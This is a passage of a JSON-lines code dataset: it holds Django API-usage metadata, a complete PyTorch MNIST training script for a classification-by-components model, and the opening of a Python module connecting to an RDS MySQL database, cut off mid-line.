"call"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 89, "usage_type": "call"}, {"api_name": "fields.DataRoleField.ELECTRICITY_TARIFF", "line_number": 91, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 91, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2_QUOTIENT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.query_utils.Q", "line_number": 100, "usage_type": "call"}, {"api_name": "gridplatform.trackuser.get_provider_id", "line_number": 105, "usage_type": "call"}, {"api_name": "django.db.models.query_utils.Q", "line_number": 109, "usage_type": "call"}, {"api_name": "gridplatform.encryption.managers.DecryptingManager", "line_number": 120, "usage_type": "name"}, {"api_name": "gridplatform.utils.models.StoredSubclassManager", "line_number": 120, "usage_type": "name"}, {"api_name": "gridplatform.encryption.managers.DecryptingQuerySet", "line_number": 124, "usage_type": "name"}, {"api_name": "django.db.models.query.ValuesQuerySet", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.query.ValuesListQuerySet", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.query.DateQuerySet", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.query.DateTimeQuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 152, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 152, "usage_type": "name"}, {"api_name": "gridplatform.utils.models.StoreSubclass", "line_number": 159, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 221, "usage_type": "call"}, {"api_name": "gridplatform.customers.models.Customer", "line_number": 221, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 221, "usage_type": "name"}, {"api_name": "django.db.models.PROTECT", "line_number": 221, "usage_type": "attribute"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 222, "usage_type": "name"}, {"api_name": "fields.DataRoleField", "line_number": 223, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 225, "usage_type": "call"}, {"api_name": "graph.Graph", "line_number": 225, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 225, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.fields.BuckinghamField", "line_number": 228, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 230, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 230, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 231, "usage_type": "call"}, {"api_name": "gridplatform.utils.utilitytypes.OPTIONAL_METER_CHOICES", "line_number": 231, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.utilitytypes", "line_number": 231, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 241, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 243, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 245, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 247, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 249, "usage_type": "call"}, {"api_name": "gridplatform.utils.models.StoreSubclass.Meta", "line_number": 252, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.models.StoreSubclass", "line_number": 252, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 253, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 254, "usage_type": "call"}, {"api_name": "gridplatform.customers.models.Customer", "line_number": 276, "usage_type": "name"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 315, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 389, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 447, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 458, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 467, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 520, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 520, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 524, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 524, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 527, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 527, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.RESOLUTIONS", "line_number": 530, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.condense", "line_number": 530, "usage_type": "name"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 548, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 579, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 587, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 742, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 742, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 744, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 744, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 764, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 764, "usage_type": "name"}, {"api_name": "itertools.groupby", "line_number": 767, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 788, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.count_extended", "line_number": 789, "usage_type": "call"}, {"api_name": "itertools.takewhile", "line_number": 796, "usage_type": "call"}, {"api_name": "itertools.dropwhile", "line_number": 802, "usage_type": "call"}, {"api_name": "fields.DataRoleField.CONSUMPTION", "line_number": 807, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 807, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2", "line_number": 808, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 808, "usage_type": "name"}, {"api_name": "fields.DataRoleField.COST", "line_number": 809, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 809, "usage_type": "name"}, {"api_name": "fields.DataRoleField.MASS", "line_number": 810, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 810, "usage_type": "name"}, {"api_name": "fields.DataRoleField.TIME", "line_number": 811, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 811, "usage_type": "name"}, {"api_name": "fields.DataRoleField.STANDARD_HEATING_DEGREE_DAYS", "line_number": 812, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 812, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEATING_DEGREE_DAYS", "line_number": 813, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 813, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEATING_DEGREE_DAYS_CORRECTED_CONSUMPTION", "line_number": 814, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 814, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLUME", "line_number": 815, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 815, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ENERGY_DRIVER", "line_number": 816, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 816, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRODUCTION", "line_number": 817, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 817, "usage_type": "name"}, {"api_name": "fields.DataRoleField.REACTIVE_ENERGY", "line_number": 818, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 818, "usage_type": "name"}, {"api_name": "fields.DataRoleField.STATE", "line_number": 827, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 827, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEAT_TARIFF", "line_number": 828, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 828, "usage_type": "name"}, {"api_name": "fields.DataRoleField.GAS_TARIFF", "line_number": 829, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 829, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ELECTRICITY_TARIFF", "line_number": 830, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 830, "usage_type": "name"}, {"api_name": "fields.DataRoleField.WATER_TARIFF", "line_number": 831, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 831, "usage_type": "name"}, {"api_name": "fields.DataRoleField.OIL_TARIFF", "line_number": 832, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 832, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2_QUOTIENT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 833, "usage_type": "name"}, {"api_name": "fields.DataRoleField.EMPLOYEES", "line_number": 834, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 834, "usage_type": "name"}, {"api_name": "fields.DataRoleField.AREA", "line_number": 835, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 835, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_ELECTRICITY_TARIFF", "line_number": 836, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 836, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_GAS_TARIFF", "line_number": 837, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 837, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_HEAT_TARIFF", "line_number": 838, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 838, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_WATER_TARIFF", "line_number": 839, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 839, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_OIL_TARIFF", "line_number": 840, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 840, "usage_type": "name"}, {"api_name": "fields.DataRoleField.POWER", "line_number": 844, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 844, "usage_type": "name"}, {"api_name": "fields.DataRoleField.REACTIVE_POWER", "line_number": 845, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 845, "usage_type": "name"}, {"api_name": "fields.DataRoleField.POWER_FACTOR", "line_number": 846, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 846, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 847, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 847, "usage_type": "name"}, {"api_name": "fields.DataRoleField.RELATIVE_TEMPERATURE", "line_number": 848, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 848, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLUME_FLOW", "line_number": 849, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 849, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLTAGE", "line_number": 850, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 850, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CURRENT", "line_number": 851, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 851, "usage_type": "name"}, {"api_name": "fields.DataRoleField.FREQUENCY", "line_number": 852, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 852, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRESSURE", "line_number": 853, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 853, "usage_type": "name"}, {"api_name": "fields.DataRoleField.LINEAR_REGRESSION", "line_number": 854, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 854, "usage_type": "name"}, {"api_name": "fields.DataRoleField.EFFICIENCY", "line_number": 855, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 855, "usage_type": "name"}, {"api_name": "fields.DataRoleField.MEAN_COOLDOWN_TEMPERATURE", "line_number": 861, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 861, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CONSUMPTION_UTILIZATION_EMPLOYEES", "line_number": 862, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 862, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CONSUMPTION_UTILIZATION_AREA", "line_number": 863, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 863, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRODUCTION_ENPI", "line_number": 864, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 864, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEAT_LOSS_COEFFICIENT", "line_number": 865, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 865, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_ELECTRICITY_TARIFF", "line_number": 869, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 869, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_GAS_TARIFF", "line_number": 870, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 870, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_HEAT_TARIFF", "line_number": 871, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 871, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_WATER_TARIFF", "line_number": 872, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 872, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_OIL_TARIFF", "line_number": 873, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 873, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN", "line_number": 874, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 874, "usage_type": "name"}, {"api_name": "fields.DataRoleField.TARIFFS", "line_number": 954, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 954, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 990, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 991, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 998, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 999, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1009, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1013, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1023, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1027, "usage_type": "argument"}, {"api_name": "fractions.Fraction", "line_number": 1039, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 1041, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1075, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1079, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1085, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1094, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 1216, "usage_type": "call"}, {"api_name": "itertools.ifilter", "line_number": 1216, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1235, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1246, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1253, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1263, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1306, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1331, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1344, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity.compatible_units", "line_number": 1346, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1346, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 1347, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1347, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1348, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 1348, "usage_type": "call"}, {"api_name": "fields.DataRoleField.RELATIVE_TEMPERATURE", "line_number": 1350, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1350, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity.compatible_units", "line_number": 1353, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1353, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1363, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1385, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1386, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1387, "usage_type": "call"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 1399, "usage_type": "call"}, {"api_name": "legacy.legacy_utils.preferredunits.get_preferred_unit_converter", "line_number": 1401, "usage_type": "call"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 1406, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1406, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 1409, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 1409, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 1426, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 1426, "usage_type": "attribute"}, {"api_name": "django.db.models.BigIntegerField", "line_number": 1428, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1428, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1428, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1429, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1432, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1433, "usage_type": "call"}]} +{"seq_id": "500260711", "text": "import argparse\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nfrom torch_cbc.cbc_model import CBCModel\nfrom torch_cbc.losses import MarginLoss\nfrom torch_cbc.layers import ConstrainedConv2d\n\nfrom utils import visualize_components\n\n\nclass Backbone(nn.Module):\n def __init__(self, activation=nn.Hardswish()):\n super(Backbone, self).__init__()\n self.conv2d = ConstrainedConv2d\n self.activation = activation\n\n self.conv1 = self.conv2d(1, 32, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv1.weight)\n torch.nn.init.zeros_(self.conv1.bias)\n self.conv2 = self.conv2d(32, 64, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv2.weight)\n torch.nn.init.zeros_(self.conv2.bias)\n self.conv3 = self.conv2d(64, 64, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv3.weight)\n torch.nn.init.zeros_(self.conv3.bias)\n self.conv4 = self.conv2d(64, 128, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv4.weight)\n torch.nn.init.zeros_(self.conv4.bias)\n self.maxpool2d = nn.MaxPool2d(2)\n\n def forward(self, x):\n x = self.activation(self.conv2(self.activation(self.conv1(x))))\n x = self.maxpool2d(x)\n x = self.activation(self.conv4(self.activation(self.conv3(x))))\n x = self.maxpool2d(x)\n return x\n\n\ndef train(args, model, device, train_loader, optimizer, lossfunction, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n\n onehot = torch.zeros(len(target), 10, device=device) \\\n .scatter_(1, target.unsqueeze(1), 1.) # 10 classes\n loss = lossfunction(output, onehot).mean()\n loss.backward()\n optimizer.step()\n\n for name, p in model.named_parameters():\n if ('components' in name) or ('reasoning' in name):\n p.data.clamp_(0, 1)\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef test(args, model, device, test_loader, lossfunction):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n onehot = torch.zeros(len(target), 10, device=device) \\\n .scatter_(1, target.unsqueeze(1), 1.) # 10 classes\n test_loss += lossfunction(output, onehot).sum().item() # sum up batch loss # noqa\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability # noqa\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\\n'.format( # noqa\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n return test_loss\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N', # noqa\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.003, metavar='LR',\n help='learning rate (default: 0.003)')\n parser.add_argument('--margin', type=float, default=0.3,\n help='Margin Loss margin (default: 0.3)')\n parser.add_argument('--n_components', type=int, default=9, metavar='C',\n help='number of components (default: 9)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status') # noqa\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomAffine(0, \n translate=(0.1, 0.1)),\n transforms.RandomRotation(15, fill=(0,)),\n transforms.ToTensor()\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor()\n ])),\n batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n backbone = Backbone()\n model = CBCModel(backbone,\n n_classes=10,\n n_components=args.n_components,\n component_shape=(1, 28, 28)).to(device)\n\n print(model)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=1e-5)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min',\n patience=3,\n factor=0.9,\n verbose=True)\n\n lossfunction = MarginLoss(margin=args.margin)\n\n print(\"Starting training\")\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, lossfunction, epoch) # noqa\n test_loss = test(args, model, device, test_loader, lossfunction)\n scheduler.step(test_loss)\n visualize_components(epoch, model, \"./visualization\")\n\n if (args.save_model):\n torch.save(model.state_dict(), \"mnist_cnn.pt\")\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "mnist.py", "file_name": "mnist.py", "file_ext": "py", "file_size_in_byte": 6901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Hardswish", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch_cbc.layers.ConstrainedConv2d", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 120, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 120, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 121, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 121, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomAffine", "line_number": 122, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 122, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 124, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 124, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 125, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 129, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 129, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 130, "usage_type": "name"}, {"api_name": "torch_cbc.cbc_model.CBCModel", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 143, "usage_type": "name"}, {"api_name": "torch_cbc.losses.MarginLoss", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.visualize_components", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "552300567", "text": "import pymysql\nimport json\nimport rds_config\n\n#Var for RDS Connection\nrds_dbhost = rds_config.db_host\nrds_dbname = rds_config.db_name\nrds_dbuser = rds_config.db_username\nrds_dbpwd = rds_config.db_password\n\n#Make Connection to RDS Instance\ntercdbcon = 